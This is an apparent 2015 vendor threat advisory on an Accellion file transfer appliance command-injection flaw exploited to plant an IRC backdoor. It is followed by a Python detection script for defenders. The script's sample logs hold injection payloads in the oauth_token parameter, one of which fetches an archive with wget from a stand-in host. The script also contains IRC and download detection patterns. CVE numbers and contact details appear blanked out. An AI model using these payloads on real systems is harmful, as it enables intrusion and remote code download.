


Threat Advisory: Accellion File Transfer Appliance Vulnerability

Niara Threat Advisories provide timely information regarding new attacks, along with how Niara helps companies quickly detect an attack to limit its impact and prevent it from establishing a persistent presence within the organization. Niara's security analytics platform provides a rich set of capabilities to automatically find attacks on the inside that evaded real-time defense systems and to focus security teams' efforts on the threats that matter. For more details on Niara's capabilities or to schedule a demo to see Niara in action, contact us at or at.

What did Niara discover?

Niara has discovered (as far as we know) the first sighting of CVE in the wild. CVE is the Accellion File Transfer Appliance (FTA) vulnerability discovered by Rapid7 in mid-2015. Late last month, Niara's security researchers identified a compromised Accellion FTA within an organization. The Accellion FTA was being used as a beachhead to launch further attacks on other Accellion FTAs and to create a cluster of compromised servers. While the motivation for this is not known, any compromise of a server storing important files should be taken very seriously.

What is the Accellion Secure File Transfer Appliance vulnerability?

The Accellion FTA provides secure file sharing and transfer for both internal and external recipients. In mid-2015, Rapid7 discovered a remote command execution (RCE) vulnerability in the Accellion FTA which could give cyber criminals near-complete access to the appliance, potentially resulting in the exfiltration of secure files. The vulnerability is made possible by insufficient sanitization of the oauth_token parameter, combined with how file permissions are configured by default. It is present in appliance software version FTA_9_11_200 and likely all prior versions. Accellion quickly released updated software (FTA_9_11_210) to address it; however, because patch cycles differ between organizations, the vulnerability remains on deployed appliances. The Common Vulnerabilities and Exposures (CVE) identifier of this vulnerability is CVE.

Copyright 2015 Niara, Inc.

Technical Analysis

Figure 1: Visualization of the attack
2. Install IRC backdoor on compromised Accellion FTA
3. Connect to a command and control (C&C) server
4. Download exploit tools and instructions from another C&C server
5. Download LoRD of IRAN HACKERS backdoor
Perform the exploit to compromise other vulnerable Accellion FTAs

The attackers downloaded Kaiten, a well-known IRC backdoor, onto the compromised Accellion FTA. The backdoor served as the primary channel through which the cyber criminals issued commands to the compromised server, using the IRC protocol. The attackers then issued commands to download a compressed archive file () that contained all the tools and the blueprint for exploiting the CVE (e.g., a port scanner, binaries to conduct the exploits, instructions, etc.). Once downloaded, the archive was decompressed and unpacked.
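As an added example (not code from Niara, Accellion or Rapid7), the following Python flags both stages described on this page: requests whose oauth_token parameter, once percent-decoded, no longer looks like an opaque token (which is how an attempt to abuse the insufficiently sanitized parameter appears in the appliance's web log), and outbound IRC handshakes or archive downloads initiated by the appliance itself, which correspond to the backdoor's C&C channel and the tool download in the Technical Analysis. The Apache combined log format, the /api/status path, the token allowlist, and every address, host and log line below are assumptions constructed for the example.

```python
"""Detection logic for the two stages of the Accellion FTA attack chain
described in this advisory, run over constructed sample logs.

This is an added example, not code from Niara or Accellion. The web log
format is assumed to be Apache combined style, the /api/status path is a
placeholder for the vulnerable endpoint, and all addresses, hosts and
log lines below are constructed for the example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Stage 1: requests whose oauth_token carries shell metacharacters. The
# advisory attributes the RCE to insufficient sanitization of that
# parameter, so an injection attempt shows up in the web log as a token
# that is no longer an opaque string.
COMBINED_LOG = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Assumption: a legitimate token consists of these characters only.
TOKEN_OK = re.compile(r'^[A-Za-z0-9._~-]+$')

SAMPLE_ACCESS_LOG = [  # constructed lines, not real FTA logs
    '198.51.100.5 - - [14/Jul/2015:10:21:03 +0000] "GET /api/status?oauth_token=3f9c0b1e7a2d HTTP/1.1" 200 512',
    '203.0.113.7 - - [14/Jul/2015:10:22:41 +0000] "GET /api/status?oauth_token=x%3Bid%3B HTTP/1.1" 200 1884',
    '203.0.113.7 - - [14/Jul/2015:10:23:05 +0000] "GET /api/status?oauth_token=x%24%28wget%20http%3A%2F%2F203.0.113.9%2Fk.tgz%29 HTTP/1.1" 200 1902',
    '198.51.100.6 - - [14/Jul/2015:10:25:00 +0000] "POST /login HTTP/1.1" 302 0',
]


def parse_access_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_LOG.match(line)
    return m.groupdict() if m else None


def suspicious_oauth_tokens(lines):
    """One finding per request whose decoded oauth_token fails the allowlist."""
    findings = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        query = urlsplit(rec["target"]).query
        # parse_qs percent-decodes, so %3B and %24%28 are caught as ';' and '$('.
        for token in parse_qs(query).get("oauth_token", []):
            if not TOKEN_OK.match(token):
                findings.append({"client": rec["client"], "time": rec["time"], "token": token})
    return findings


# Stage 2: the appliance itself reaching out. A file transfer appliance has
# no reason to speak IRC, and an archive fetched by the appliance matches
# the tool download described in the advisory. Records are (timestamp,
# src, dst, dst_port, first bytes of the client payload), as a flow sensor
# with payload capture would provide; constructed for the example.
APPLIANCE_HOSTS = {"10.0.0.20"}
IRC_HANDSHAKE = re.compile(r'^(NICK|USER|PASS|JOIN|PRIVMSG)\s')
ARCHIVE_GET = re.compile(r'^GET \S+\.(tgz|tar\.gz|tar|zip|gz)(\?\S*)? HTTP/', re.I)

SAMPLE_CONN_LOG = [  # constructed records
    ("2015-07-14T10:24:10Z", "10.0.0.20", "203.0.113.9", 80, "GET /k.tgz HTTP/1.0\r\n"),
    ("2015-07-14T10:24:30Z", "10.0.0.20", "203.0.113.21", 6667, "NICK fta20\r\nUSER fta20 8 * :fta20\r\n"),
    ("2015-07-14T10:24:31Z", "10.0.0.20", "203.0.113.21", 6667, "JOIN #ops\r\n"),
    ("2015-07-14T10:30:00Z", "10.0.0.20", "10.0.0.5", 25, "EHLO fta\r\n"),
    ("2015-07-14T10:31:00Z", "10.0.0.33", "203.0.113.21", 6667, "NICK bob\r\n"),
    ("2015-07-14T10:35:00Z", "10.0.0.20", "203.0.113.9", 80, "GET /index.html HTTP/1.0\r\n"),
]


def appliance_c2_activity(records, appliance_hosts=APPLIANCE_HOSTS):
    """Flag IRC handshakes and archive downloads initiated by an appliance host."""
    hits = []
    for ts, src, dst, dport, payload in records:
        if src not in appliance_hosts:
            continue
        if IRC_HANDSHAKE.match(payload):
            reason = "irc-handshake"
        elif ARCHIVE_GET.match(payload):
            reason = "outbound-download"
        else:
            continue
        hits.append({"time": ts, "src": src, "dst": dst, "dport": dport, "reason": reason})
    return hits


def analyze(access_lines=SAMPLE_ACCESS_LOG, conn_records=SAMPLE_CONN_LOG):
    """Run both detections and return their findings keyed by stage."""
    return {
        "injection_attempts": suspicious_oauth_tokens(access_lines),
        "c2_activity": appliance_c2_activity(conn_records),
    }


if __name__ == "__main__":
    for stage, findings in analyze().items():
        print(stage)
        for finding in findings:
            print("  ", finding)
```

Two design choices matter here. The token check is an allowlist applied to the decoded value rather than a blocklist of metacharacters, so percent-encoding or a character the blocklist forgot does not evade it. The IRC rule matches on the first bytes of the client payload rather than on port 6667, because an IRC backdoor can be pointed at any port; the appliance-host set is the only site-specific input.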
